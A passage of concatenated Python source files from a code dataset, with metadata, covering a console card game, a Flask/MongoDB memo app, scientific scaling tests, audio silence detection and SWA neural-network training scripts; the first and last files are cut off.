self.enemyworldcards[i].remain_health), end=' ')\n else:\n print(\"$$$$我方场上卡牌$$$$$$$$$$$$$\")\n if len(self.myworldcards) == 0:\n print(\"场上没有卡牌!!!\")\n else:\n for card in self.myworldcards:\n card.show()\n else:\n print(\"$$$$敌方场上卡牌$$$$$$$$$$$$$\")\n if len(self.enemyworldcards) == 0:\n print(\"场上没有卡牌!!!\")\n else:\n for card in self.enemyworldcards:\n card.show()\n\n def show_cards(self, cards):\n for i, card in enumerate(cards):\n print(\"\\t%s-%s(%s)\" % (i + 1, card.name, card.mana))\n\n def battle(self, mycards, enemycards, enemyhero):\n \"\"\"\n 攻击对方\n :param mycards: \n :param enemycards: \n :param enemyherohealth: \n :param Auto: True随机对象 False手动选择\n :return: \n \"\"\"\n if len(mycards) > 0:\n for i in range(len(mycards) - 1, -1, -1):\n if len(enemycards) > 0:\n if self.myturn:\n print(\"------------攻击----------------\")\n print(\"{0}({1}-{2}) 准备攻击:\".format(mycards[i].name, mycards[i].damage,\n mycards[i].remain_health))\n print(\"敌方英雄血量={0}\".format(enemyhero.health))\n self.show_world_cards(True)\n attack_hero = input(\"\\n>>>>>>>>>>>>>>是否攻击敌方英雄(Y/N),结束回合(Q)?\")\n if attack_hero == 'Q':\n break\n elif attack_hero == 'Y':\n self.enemyhero.health_change(-self.myworldcards[i].damage)\n else:\n enemy_id = self.attack_who(enemycards)\n print(\"%s%s-%s attack %s%s-%s\" % (\n mycards[i].name, mycards[i].damage, mycards[i].remain_health,\n enemycards[enemy_id].name, enemycards[enemy_id].damage,\n enemycards[enemy_id].remain_health))\n mycards[i].attack(enemycards[enemy_id])\n mycards[i].show()\n enemycards[enemy_id].show()\n if mycards[i].alive == False:\n del mycards[i]\n if enemycards[enemy_id].alive == False:\n del enemycards[enemy_id]\n else:\n print(\"------------攻击----------------\")\n print(\"{0}({1}-{2}) 准备攻击:\".format(mycards[i].name, mycards[i].damage,\n mycards[i].remain_health))\n print(\"敌方英雄血量={0}\".format(enemyhero.health))\n self.show_world_cards(True)\n enemy_id = self.attack_who(enemycards)\n print(\"%s%s-%s attack %s%s-%s\" % (\n mycards[i].name, mycards[i].damage, mycards[i].remain_health,\n enemycards[enemy_id].name, enemycards[enemy_id].damage,\n enemycards[enemy_id].remain_health))\n mycards[i].attack(enemycards[enemy_id])\n mycards[i].show()\n enemycards[enemy_id].show()\n if mycards[i].alive == False:\n del mycards[i]\n if enemycards[enemy_id].alive == False:\n del enemycards[enemy_id]\n else:\n if self.myturn:\n print(\"%s-%s攻击敌方英雄\" % (mycards[i].name, mycards[i].damage))\n enemyhero.health -= mycards[i].damage\n print(\"%%%%%%%%%%%敌方英雄生命:\", enemyhero.health)\n else:\n print(\"%s-%s攻击我方英雄\" % (mycards[i].name, mycards[i].damage))\n enemyhero.health -= mycards[i].damage\n print(\"%%%%%%%%%%%我方英雄生命:\", enemyhero.health)\n return mycards, enemycards, enemyhero\n\n def attack(self, attack_card, be_attacked_card, i, enemy_id):\n '''\n\n :param attack_card: \n :param be_attacked_card: \n :param i: \n :param enemy_id: \n :return: \n '''\n print(\"%s%s-%s attack %s%s-%s\" % (\n attack_card[i].name, attack_card[i].damage,\n attack_card[i].remain_health,\n be_attacked_card[enemy_id].name, be_attacked_card[enemy_id].damage,\n be_attacked_card[enemy_id].remain_health))\n attack_card[i].attack(be_attacked_card[enemy_id])\n attack_card[i].show()\n be_attacked_card[enemy_id].show()\n if attack_card[i].alive == False:\n del attack_card[i]\n if be_attacked_card[enemy_id].alive == False:\n del be_attacked_card[enemy_id]\n return attack_card, be_attacked_card\n\n def use_mana_action(self, mana):\n \"\"\"\n 使用英雄技能、卡牌上场\n :param cards: \n :param mana: \n :return: \n \"\"\"\n if self.myturn:\n while self.can_use_power(mana) or self.enough_mana(self.myhandcards, mana):\n print(\"^^^^我方手牌^^^^^^^^^^^^\")\n self.show_cards(self.myhandcards)\n print(\"-----------------剩余水晶为:{0}\".format(mana))\n if self.can_use_power(mana):\n use = input(\">>>>>>>>>>>>>>是否使用英雄技能(Y/N),不再使用水晶(Q):\")\n if use == 'Q':\n break\n elif use == 'Y':\n self.use_power(self.myhero)\n mana -= 2\n self.myhero.use_power = True\n elif self.enough_mana(self.myhandcards, mana):\n goto_num = int(input(\">>>>>>>>>>>>>>请选择你要上场的卡牌号码,不再使用水晶(0):\"))\n if goto_num == 0:\n break\n elif self.myhandcards[goto_num - 1].mana <= mana:\n self.myworldcards.append(self.myhandcards[goto_num - 1])\n print(\"\\t%s-%s(%s)上场!!!\" % (\n goto_num, self.myhandcards[goto_num - 1].name, self.myhandcards[goto_num - 1].mana))\n mana -= self.myhandcards[goto_num - 1].mana\n del self.myhandcards[goto_num - 1]\n else:\n print(\"输入卡牌的水晶({0})大于剩余水晶({1})!\".format(self.myhandcards[goto_num - 1].mana, mana))\n elif use == 'N':\n break\n\n else:\n goto_num = int(input(\">>>>>>>>>>>>>>请选择你要上场的卡牌号码,不再使用水晶(0):\"))\n if goto_num == 0:\n break\n elif self.myhandcards[goto_num - 1].mana <= mana:\n self.myworldcards.append(self.myhandcards[goto_num - 1])\n print(\"\\t%s-%s(%s)上场!!!\" % (\n goto_num, self.myhandcards[goto_num - 1].name, self.myhandcards[goto_num - 1].mana))\n mana -= self.myhandcards[goto_num - 1].mana\n del self.myhandcards[goto_num - 1]\n else:\n print(\"输入卡牌的水晶({0})大于剩余水晶({1})!\".format(self.myhandcards[goto_num - 1].mana, mana))\n else:\n print(\"^^^^敌方手牌^^^^^^^^^^^^\")\n self.show_cards(self.enemyhandcards)\n\n for i in range(len(self.enemyhandcards) - 1, -1, -1):\n if self.enemyhandcards[i].mana <= mana:\n self.enemyworldcards.append(self.enemyhandcards[i])\n print(\">>>>>>>>>>>>>>>>>>\")\n print(\n \"\\t%s-%s(%s)上场!!!\" % (i + 1, self.enemyhandcards[i].name, self.enemyhandcards[i].mana))\n mana -= self.enemyhandcards[i].mana\n del self.enemyhandcards[i]\n\n if mana >= 2:\n self.use_power(self.enemyhero)\n mana -= 2\n\n def can_use_power(self, mana):\n '''\n 判断是否可以使用英雄技能\n :param mana: \n :return: \n '''\n can_use = False\n if self.myhero.use_power == False and mana >= 2:\n can_use = True\n return can_use\n\n def enough_mana(self, cards, mana):\n \"\"\"\n 判断是否剩余水晶足够:有卡牌的水晶小于剩余水晶\n :param cards: \n :param mana: \n :return: \n \"\"\"\n enough = False\n for card in cards:\n if card.mana <= mana:\n enough = True\n break\n return enough\n\n def attack_who(self, cards):\n \"\"\"\n 敌方场上卡牌数量>1,我方回合手动选择攻击对象,敌方回合自动攻击\n :param cards: \n :return: \n \"\"\"\n if len(cards) == 1:\n return 0\n elif self.myturn:\n who = int(input(\">>>>>>>>>>>>>>请选择你要攻击的卡牌:\"))\n if who < 1 or who >= len(cards) + 1:\n print(\"输入有误,请重新选择!!!\")\n return self.attack_who(cards)\n return who - 1\n else:\n card_id = randint(0, len(cards) - 1)\n return card_id\n\n def hero_death(self, hero):\n \"\"\"\n 英雄是否死亡\n :param hero: \n :return: \n \"\"\"\n if hero <= 0:\n return True\n\n\ndef main():\n game = world()\n game.turn_round()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"炉火传说/main_v9.0.py","file_name":"main_v9.0.py","file_ext":"py","file_size_in_byte":15775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37171905","text":"# Copyright 2019 Regents of the University of Minnesota.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Hello world tutorial pipeline.\n\nThis example is on the MTAP documentation website, if it stops working please update the associated documentation file\nat ``docs/tutorials/python.md``.\n\"\"\"\nimport sys\n\nif __name__ == '__main__':\n from mtap import Document, Event, Pipeline, events_client\n from mtap import RemoteProcessor\n\n pipeline = Pipeline(\n RemoteProcessor(name='helloprocessor', address=sys.argv[2]),\n )\n with events_client(sys.argv[1]) as client:\n with Event(event_id='1', client=client) as event:\n document = Document(document_name='name', text='YOUR NAME')\n event.add_document(document)\n pipeline.run(document)\n index = document.labels['hello']\n for label in index:\n print(label.response)\n","sub_path":"python/mtap/examples/tutorial/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192115040","text":"import logging\n\nimport numpy as np\nimport pandas as pd\n\nimport GTS as gts\nfrom GTS.isc_modelling.setup import _prepare_params\n\nlogger = logging.getLogger(__name__)\n\n\ndef test_conditioning(*, length_scales, scalar_scales, **kwargs):\n \"\"\" Run the 'test_condition_number' for various scaling parameters\n\n Parameters\n ----------\n length_scales, scalar_scales : list\n lists of length- and scalar scales to test.\n **kwargs :\n Recommended to adjust:\n sz : size of mesh elements (uniform)\n shearzone_names : which shearzones (if any) to include\n \"\"\"\n\n # Initialize empty DataFrame for storage\n results = pd.DataFrame(columns=[\"ls\", \"ss\", \"max_elem\", \"max_A_sum\", \"min_A_sum\"])\n\n # loop through all scaling coefficients\n for ls in length_scales:\n for ss in scalar_scales:\n max_elem, max_A_sum, min_A_sum = test_condition_number(\n ls=ls, ss=ss, **kwargs\n )\n v = {\n \"ls\": ls,\n \"ss\": ss,\n \"max_elem\": max_elem,\n \"max_A_sum\": max_A_sum,\n \"min_A_sum\": min_A_sum,\n }\n results = results.append(v, ignore_index=True)\n\n results[\"ratio\"] = results[\"max_A_sum\"] / results[\"min_A_sum\"]\n return results\n\n\ndef test_condition_number(**kwargs):\n # TODO: Rename this method (and dependent notebooks usages)\n # to something more suitable\n \"\"\" Method to create a mesh and discretize equations.\n\n Parameters\n ----------\n **kwargs :\n pass non-default arguments.\n\n Returns\n -------\n max_elem, max_A_sum, min_A_sum : float\n quantitative estimates for condition number\n \"\"\"\n ls = kwargs.get(\"ls\", 1)\n ss = kwargs.get(\"ss\", 1)\n\n params = make_params_for_scaling(**kwargs)\n\n setup = gts.ContactMechanicsBiotISC(params)\n setup.prepare_simulation()\n\n logger.info(f\"ls= {ls:.3e}, ss= {ss:.3e}\")\n return report_condition_number(setup)\n\n\ndef report_condition_number(setup):\n \"\"\" Extract the estimated condition number for a given setup\"\"\"\n\n A, b = setup.assembler.assemble_matrix_rhs()\n logger.info(\"Max element in A {0:.2e}\".format(np.max(np.abs(A))))\n logger.info(\n \"Max {0:.2e} and min {1:.2e} A sum.\".format(\n np.max(np.sum(np.abs(A), axis=1)), np.min(np.sum(np.abs(A), axis=1))\n )\n )\n max_elem = np.max(np.abs(A))\n max_A_sum = np.max(np.sum(np.abs(A), axis=1))\n min_A_sum = np.min(np.sum(np.abs(A), axis=1))\n\n return max_elem, max_A_sum, min_A_sum\n\n\ndef make_params_for_scaling(**kwargs):\n \"\"\" Wrapper to _prepare_params for typical setups these tests will use\n\n You should set:\n ls, ss : scaling\n sz : uniform characteristic size of mesh elements\n shearzone_names : which shearzones to include.\n \"\"\"\n\n # Get some common args\n sz = kwargs.get(\"sz\", 80)\n ls = kwargs.get(\"ls\", 1)\n ss = kwargs.get(\"ss\", 1)\n sz_names = kwargs.get(\n \"shearzone_names\", None\n ) # [\"S1_1\", \"S1_2\", \"S1_3\", \"S3_1\", \"S3_2\"]\n\n params = {\n \"length_scale\": ls,\n \"scalar_scale\": ss,\n \"shearzone_names\": sz_names,\n \"mesh_args\": {\n \"mesh_size_frac\": sz,\n \"mesh_size_min\": sz,\n \"mesh_size_bound\": sz,\n },\n # turn off gravity\n \"_gravity_bc_p\": False,\n \"_gravity_src\": False,\n \"_gravity_bc\": False,\n \"path_head\": kwargs.get(\"path_head\", \"test_fracture_complexity/test_1\"),\n }\n\n params = _prepare_params(params=params, setup_loggers=False)\n\n return params\n","sub_path":"src/mastersproject/GTS/test/test_scaling/test_scaling_util.py","file_name":"test_scaling_util.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37029384","text":"import numpy as np\nimport matplotlib.pylab as plt\n\ndispData = np.genfromtxt('Damperdisp.out')\ndisp = dispData[:, 1]\nforceData = np.genfromtxt('Damperforce.out')\nforce = forceData[:, 1]\n\nplt.plot(disp, force)\nplt.show()\n","sub_path":"Shear-Frame-with-Viscous-Dampers/Output/forceDisp.py","file_name":"forceDisp.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"564681105","text":"from utils import make_model\nfrom models import NBeatsModel, DualAttentionModel\n\nimport pandas as pd\n\n\ndef make_and_run(input_model, _layers=None, lookback=12, epochs=4, **kwargs):\n\n\n data_config, nn_config, total_intervals = make_model(batch_size=16,\n lookback=lookback,\n lr=0.001,\n epochs=epochs,\n **kwargs)\n nn_config['layers'] = _layers\n\n df = pd.read_csv(\"../data/nasdaq100_padding.csv\")\n\n _model = input_model(data_config=data_config,\n nn_config=nn_config,\n data=df,\n intervals=total_intervals\n )\n\n _model.build_nn()\n\n _ = _model.train_nn(indices='random')\n\n _ = _model.predict(use_datetime_index=False)\n\n return _model\n\n##\n# NBeats based model\nmodel = make_and_run(NBeatsModel)\n\n##\n# DualAttentionModel based model\nmake_and_run(DualAttentionModel)\n","sub_path":"tests/test_models_using_targets.py","file_name":"test_models_using_targets.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283717156","text":"\"\"\"\nFlask web app connects to Mongo database.\nKeep a simple list of dated memoranda.\n\nRepresentation conventions for dates: \n - We use Arrow objects when we want to manipulate dates, but for all\n storage in database, in session or g objects, or anything else that\n needs a text representation, we use ISO date strings. These sort in the\n order as arrow date objects, and they are easy to convert to and from\n arrow date objects. (For display on screen, we use the 'humanize' filter\n below.) A time zone offset will \n - User input/output is in local (to the server) time. \n\"\"\"\n\nimport flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask import jsonify # For AJAX transactions\n\n\nimport json\nimport logging\n\n# Date handling \nimport arrow # Replacement for datetime, based on moment.js\nimport datetime # But we may still need time\nfrom dateutil import tz # For interpreting local times\n\n\n# Mongo database\nfrom pymongo import MongoClient\n\n\n###\n# Globals\n###\nimport CONFIG\n\napp = flask.Flask(__name__)\n\ntry: \n dbclient = MongoClient(CONFIG.MONGO_URL)\n db = dbclient.memos\n collection = db.dated\n\nexcept:\n print(\"Failure opening database. Is Mongo running? Correct password?\")\n sys.exit(1)\n\nimport uuid\napp.secret_key = str(uuid.uuid4())\n\n###\n# Pages\n###\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n app.logger.debug(\"Main page entry\")\n flask.session['memos'] = get_memos()\n for memo in flask.session['memos']:\n app.logger.debug(\"Memo: \" + str(memo))\n return flask.render_template('index.html')\n\n\n# Just give the client the requested create.html file\n@app.route(\"/create\")\ndef create():\n app.logger.debug(\"Create\")\n return flask.render_template('create.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n app.logger.debug(\"Page not found\")\n return flask.render_template('page_not_found.html',\n badurl=request.base_url,\n linkback=url_for(\"index\")), 404\n\n\n################\n#\n# Stores the memo in the db\n#\n###############\n@app.route(\"/_store\")\ndef store():\n \"\"\"\"\n Gets the memo and date from create.html\n then stores it in the db then returns\n \"\"\"\n app.logger.debug(\"Entering db handling\")\n text = request.args.get(\"text\", type=str)\n date = request.args.get(\"date\", type=str)\n app.logger.debug(\"text: \" + text)\n app.logger.debug(\"date: \" + date)\n\n #take date and localize it and store it in isoformat\n aDate = arrow.get(date, 'MM/DD/YYYY').replace(tzinfo='local')\n fDate = aDate.isoformat()\n record = { \"type\": \"dated_memo\",\n \"date\": fDate,\n \"text\": text\n }\n\n collection.insert(record)\n rslt = True\n return jsonify(result=rslt)\n\n\n\n###################\n#\n# Deletes the list of memos\n#\n##################\n@app.route(\"/_delete\")\ndef delete():\n \"\"\"\"\n Deletes all selected memos\n Expects a list memo _ids\n Then splits them\n \"\"\"\n memos = request.args.get(\"memos\", type=str)\n app.logger.debug(\"Memo Ids: \" + memos)\n\n remove_memos(memos)\n #return garbage\n rslt = True\n return jsonify(result=rslt)\n\n\n###########\n#\n# just removes memos from db\n#\n##########\ndef remove_memos(mems):\n \"\"\"\n :param mems: list of memo ids\n :return: nothing\n \"\"\"\n #Split it up so we can search for multiple _ids\n ids = mems.split(\" \")\n for entry in collection.find():\n #Now delete if we find it\n if str(entry[\"_id\"]) in ids:\n collection.remove(entry)\n return\n\n\n#used to humanize the date within the client\n@app.template_filter( 'humanize' )\ndef humanize_arrow_date( date ):\n \"\"\"\n Date is internal UTC ISO format string.\n Output should be \"today\", \"yesterday\", \"in 5 days\", etc.\n Arrow will try to humanize down to the minute, so we\n need to catch 'today' as a special case. \n \"\"\"\n try:\n then = arrow.get(date).to('local')\n now = arrow.utcnow().to('local')\n tomorrow = now.replace(days=1)\n if then.date() == now.date():\n human = \"Today\"\n elif then.humanize(now) == \"a day ago\":\n human = \"Yesterday\"\n elif tomorrow.date() == then.date():\n human = \"Tomorrow\"\n else: \n human = then.humanize(now)\n if human == \"in a day\":\n human = \"Tomorrow\"\n except: \n human = date\n return human\n\n\n#############\n#\n# Just gets all the memos in the db stores them in a dict sorts then and returns it\n#\n##############\ndef get_memos():\n \"\"\"\n Returns all memos in the database, in a form that\n can be inserted directly in the 'session' object.\n \"\"\"\n records = [ ]\n #if collection is empty return empty records\n if collection.count() == 0:\n return records\n\n for record in collection.find( { \"type\": \"dated_memo\" } ):\n record['date'] = arrow.get(record['date']).isoformat()\n\n #used for saving memos\n record['_id'] = str(record['_id'])\n records.append(record)\n\n #sort the memos\n sorted_records = sorted(records, key=lambda x: x[\"date\"])\n return sorted_records\n\n\nif __name__ == \"__main__\":\n # App is created above so that it will\n # exist whether this is 'main' or not\n # (e.g., if we are running in a CGI script)\n app.debug=CONFIG.DEBUG\n app.logger.setLevel(logging.DEBUG)\n # We run on localhost only if debugging,\n # otherwise accessible to world\n if CONFIG.DEBUG:\n # Reachable only from the same computer\n app.run(port=CONFIG.PORT)\n else:\n # Reachable from anywhere \n app.run(port=CONFIG.PORT,host=\"0.0.0.0\")\n\n \n","sub_path":"flask_main.py","file_name":"flask_main.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"412757329","text":"\"\"\"\nA collection of misc. utilities that are used in the main class.\n\"\"\"\nimport re\n\ndef camelcase_keys(data):\n \"\"\"\n Converts all the keys in a dict to camelcase. It works recursively to convert any nested dicts as well.\n @param data: The dict to convert\n \"\"\"\n return_dict = {}\n for key in data:\n if isinstance(data[key], dict):\n return_dict[underscore_to_camelcase(key)] = camelcase_keys(data[key])\n else:\n return_dict[underscore_to_camelcase(key)] = data[key]\n\n return return_dict\n\ndef camelcase_to_underscore(name):\n \"\"\"\n Converts a string to underscore. (Typically from camelcase.)\n @param name: The string to convert.\n \"\"\"\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)).lower()\n\ndef underscore_to_camelcase(name):\n \"\"\"\n Converts a string to camelcase. (Typically from underscore.)\n @param name: The string to convert.\n \"\"\"\n return re.sub(r'_([a-z])', lambda m: (m.group(1).upper()), name)\n\ndef underscore_keys(data):\n \"\"\"\n Converts all the keys in a dict to camelcase. It works recursively to convert any nested dicts as well.\n @param data: The dict to convert\n \"\"\"\n return_dict = {}\n for key in data:\n if isinstance(data[key], dict):\n return_dict[camelcase_to_underscore(key)] = underscore_keys(data[key])\n else:\n return_dict[camelcase_to_underscore(key)] = data[key]\n\n return return_dict\n","sub_path":"PyBambooHR/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291899987","text":"import sys\nsys.path.insert(0, \"matrix_test/helper_modules\")\nimport numpy as np\nfrom signalops import rolling_window_lastaxis, calc_rms\n\n\ndef detect_silences(x, fs, threshold=-30.):\n print(\"Detecting silence in wav files...\")\n if len(x.shape) < 2:\n x = x[:, np.newaxis]\n x = x.sum(axis=1)/2.\n env = calc_rms(x, window=int(fs*0.1))\n threshold = (10**(threshold/20.))*np.max(env)\n silence = env < threshold\n # Get segment start end indexes for all silences in envelope\n sil_start = np.where(np.sign(np.diff(silence.astype(float))) == 1)[0]\n sil_end = np.where(np.sign(np.diff(silence.astype(float))) == -1)[0]\n if silence[0]:\n sil_start = np.concatenate([[0], sil_start])\n if silence[-1]:\n sil_end = np.concatenate([sil_end, [env.size]])\n segs = np.vstack([sil_start, sil_end]).T\n validSegs = np.diff(segs) > 0.02*fs\n segs = segs[np.repeat(validSegs, 2, axis=1)].reshape(-1, 2)\n return segs\n\n\ndef slices_to_mask(slices, mask_length):\n out = np.zeros(mask_length, dtype=bool)\n for s in slices:\n out[s[0]:s[1]] = True\n return out\n\n\ndef rms_no_silences(x, fs, threshold):\n silences = detect_silences(x, fs, threshold)\n sil_mask = slices_to_mask(silences, x.size)\n rms = np.sqrt(np.mean(x[~sil_mask]**2))\n return rms\n","sub_path":"snrops.py","file_name":"snrops.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"504207006","text":"import argparse\nimport os\nimport sys\nimport time\nimport tabulate\nimport numpy as np\nimport torch\n\nfrom curvature import data, models, losses, utils\nfrom optimizers import Padam\n\nparser = argparse.ArgumentParser(description='SGD/SWA training')\n#parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n\nparser.add_argument('--dataset', type=str, default='CIFAR10', help='dataset name (default: CIFAR10)')\nparser.add_argument('--data_path', type=str, default=None, required=True, metavar='PATH',\n help='path to datasets location (default: None)')\nparser.add_argument('--use_test', dest='use_test', action='store_true',\n help='use test dataset instead of validation (default: False)')\nparser.add_argument('--batch_size', type=int, default=128, metavar='N', help='input batch size (default: 128)')\nparser.add_argument('--num_workers', type=int, default=4, metavar='N', help='number of workers (default: 4)')\nparser.add_argument('--model', type=str, default=None, required=True, metavar='MODEL',\n help='model name (default: None)')\nparser.add_argument('--ckpt', type=str, default=None, metavar='CKPT',\n help='checkpoint to averaging from (default: None)')\n\nparser.add_argument('--init_epochs', type=int, default=0, metavar='N', help='number of epochs for pretraining (default: 10)')\nparser.add_argument('--save_freq', type=int, default=10, metavar='N', help='save frequency (default: 25)')\nparser.add_argument('--eval_freq', type=int, default=1, metavar='N', help='evaluation frequency (default: 5)')\nparser.add_argument('--lr', type=float, default=0.1, metavar='LR', help='learning rate (default: 0.1)')\nparser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)')\nparser.add_argument('--wd', type=float, default=1e-4, help='weight decay (default: 1e-4)')\nparser.add_argument('--decoupled_wd', action='store_true', help=\"Enable to use AdamW - decoupled weight decay\")\nparser.add_argument(\"--normalized_wd\", action='store_true',\n help='Whether to use normalised wd. WD = WD_norm \\sqrt(\\frac{b}{BT})')\nparser.add_argument(\"--partial\", type=float, default=0.125, help='Padam partial parameter')\n\nparser.add_argument('--swa_epochs', type=int, default=100, metavar='N', help='number of epochs for swa (default: 100)')\nparser.add_argument('--swa_gap', type=int, default=1, metavar='N', help='swa averaging gap (default: 1)')\n\nparser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\n\nargs = parser.parse_args()\n\nargs.device = None\nif torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n\n# print('Preparing directory %s' % args.dir)\n# os.makedirs(args.dir, exist_ok=True)\n# with open(os.path.join(args.dir, 'command.sh'), 'w') as f:\n# f.write(' '.join(sys.argv))\n# f.write('\\n')\n\nargs.dir = args.ckpt[:-19]\nprint('directory is '+args.dir)\n\ntorch.backends.cudnn.benchmark = True\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\n\nprint('Using model %s' % args.model)\nmodel_cfg = getattr(models, args.model)\n\nloaders, num_classes = data.loaders(\n args.dataset,\n args.data_path,\n args.batch_size,\n args.num_workers,\n model_cfg.transform_train,\n model_cfg.transform_test,\n use_validation=not args.use_test,\n)\n\nprint('Preparing model')\nprint(*model_cfg.args, dict(**model_cfg.kwargs))\nmodel = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs)\nmodel.to(args.device)\n\nprint('SWA training')\nswa_model = model_cfg.base(*model_cfg.args, num_classes=num_classes, **model_cfg.kwargs)\nswa_model.to(args.device)\n\ncriterion = losses.cross_entropy\n\nif args.normalized_wd:\n weight_decay = args.wd * np.sqrt(args.batch_size / (args.epochs * args.batch_size * len(loaders['train'])))\nelse:\n weight_decay = args.wd\n\noptimizer = Padam(\n model.parameters(),\n lr=args.lr,\n betas=(0.9, 0.999),\n eps=1e-08,\n weight_decay=weight_decay,\n amsgrad=False,\n decoupled_wd=args.decoupled_wd,\n partial=args.partial\n)\n\nprint('Loading %s' % args.ckpt)\ncheckpoint = torch.load(args.ckpt)\nmodel.load_state_dict(checkpoint['state_dict'])\n\ncolumns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'te_loss', 'te_acc', 'time', 'mem_usage']\n\n\nfor epoch in range(args.init_epochs):\n time_ep = time.time()\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.init_epochs - 1:\n test_res = utils.eval(loaders['test'], model, criterion)\n else:\n test_res = {'loss': None, 'accuracy': None}\n\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n values = [args.init_epochs + epoch + 1, args.lr, train_res['loss'], train_res['accuracy'], test_res['loss'],\n test_res['accuracy'],\n test_res['top5_accuracy'], time_ep, memory_usage]\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='8.4f')\n if epoch % 40 == 0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = table.split('\\n')[2]\n print(table)\n\nif args.init_epochs % args.save_freq != 0:\n utils.save_checkpoint(\n args.dir,\n args.init_epochs,\n name='init',\n epoch=args.init_epochs,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\ncolumns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'te_loss', 'te_acc', 'te_top5_acc', 'time', 'mem_usage']\ncolumns = columns[:-2] + ['swa_tr_loss', 'swa_tr_acc', 'swa_te_loss', 'swa_te_acc', 'swa_te_top5_acc'] + columns[-2:]\nswa_res = {'loss': None, 'accuracy': None, 'top5_accuracy': None}\n\n\nt = 0\nn_swa = 0\nfor epoch in range(0, args.swa_epochs):\n time_ep = time.time()\n\n loss_sum = 0.0\n correct = 0.0\n for input, target in loaders['train']:\n if args.device.type == 'cuda':\n input = input.cuda(non_blocking=True)\n target = target.cuda(non_blocking=True)\n\n loss, output, stats = criterion(model, input, target)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n loss_sum += loss.data.item() * input.size(0)\n\n pred = output.data.argmax(1, keepdim=True)\n correct += pred.eq(target.data.view_as(pred)).sum().item()\n\n if t % args.swa_gap == 0:\n for param, swa_param in zip(model.parameters(), swa_model.parameters()):\n swa_param.data += (param.data - swa_param.data) / (n_swa + 1)\n n_swa += 1\n\n t += 1\n\n loss_sum /= len(loaders['train'].dataset)\n correct /= len(loaders['train'].dataset)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.swa_epochs - 1:\n test_res = utils.eval(loaders['test'], model, criterion)\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n utils.bn_update(loaders['train'], swa_model)\n train_swa_res = utils.eval(loaders['train'], swa_model, criterion)\n swa_res = utils.eval(loaders['test'], swa_model, criterion)\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n values = [args.init_epochs + epoch + 1, args.lr, train_res['loss'], train_res['accuracy'], test_res['loss'],\n test_res['accuracy'],\n test_res['top5_accuracy'], time_ep, memory_usage]\n values = values[:-2] + [train_swa_res['loss'], train_swa_res['accuracy'],\n swa_res['loss'], swa_res['accuracy'], swa_res['top5_accuracy']] + values[-2:]\n\n np.savez(\n args.dir + 'Padam-nogap-stats-' + str(args.init_epochs) + str(epoch+1),\n train_loss=train_res['loss'],\n time_ep=time_ep,\n memory_usage=memory_usage,\n train_accuracy=train_res['accuracy'],\n train_top5_accuracy=train_res['top5_accuracy'],\n test_loss=test_res['loss'],\n test_accuracy=test_res['accuracy'],\n test_top5_accuracy=test_res['top5_accuracy'],\n swag_loss=swa_res['loss'],\n swag_train_loss=train_swa_res['loss'],\n swag_train_acc=train_swa_res['accuracy'],\n swag_accuracy=swa_res['accuracy'],\n swag_top5_accuracy=swa_res['top5_accuracy']\n )\n\n else:\n test_res = {'loss': None, 'accuracy': None}\n swa_res = {'loss': None, 'accuracy': None}\n\n time_ep = time.time() - time_ep\n memory_usage = torch.cuda.memory_allocated() / (1024.0 ** 3)\n\n\n\n\n\n\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='8.4f')\n if epoch % 40 == 0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = 